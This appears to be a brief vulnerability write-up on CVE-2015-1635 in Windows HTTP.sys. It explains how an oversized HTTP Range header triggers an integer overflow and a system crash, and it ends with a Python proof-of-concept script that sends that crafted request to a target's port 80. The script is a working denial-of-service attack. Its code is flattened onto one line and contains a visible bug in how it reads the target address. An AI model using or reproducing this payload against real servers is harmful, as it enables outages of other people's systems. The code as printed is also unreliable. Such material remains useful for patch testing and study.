CVE-2015-1635 Identifies the latest vulnerability found in HTTP.sys of Microsoft’s Windows operating system (OS). Affecting all applications which utilize this service, HTTP.sys is susceptible to a Denial-of-Service (Dos) and potential Remote Execution vulnerabilities via an ‘HTTP range request’.
The HTTP Range request allows clients to fetch a specific offset within a file on the HTTP server. Commonly used for failed or resuming downloads, the Range Request will allow users who have only downloaded half of a 1KB file to continue downloading the remainder of the file by setting the Range in the HTTP header to '512-1024'.
To exploit the vulnerability the attacker can send a specially crafted HTTP request with a header Range: bytes=18-18446744073709551615. The server will then create the necessary kernel cache to accommodate the Range request. This will cause the system to attempt to reach an unreachable address, which causes an integer overflow and blue screens the victims system.
#Tested on Windows Server 2012 R2. import socket,sys if len(sys.argv)<=1: sys.exit('Give me an IP') Host = sys.argv def SendPayload(Payload, Host): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((Host, 80)) s.send(Payload) s.recv(1024) s.close() #Make sure iisstart.htm exist. Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n" Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n" SendPayload(Init, Host) SendPayload(Payload, Host)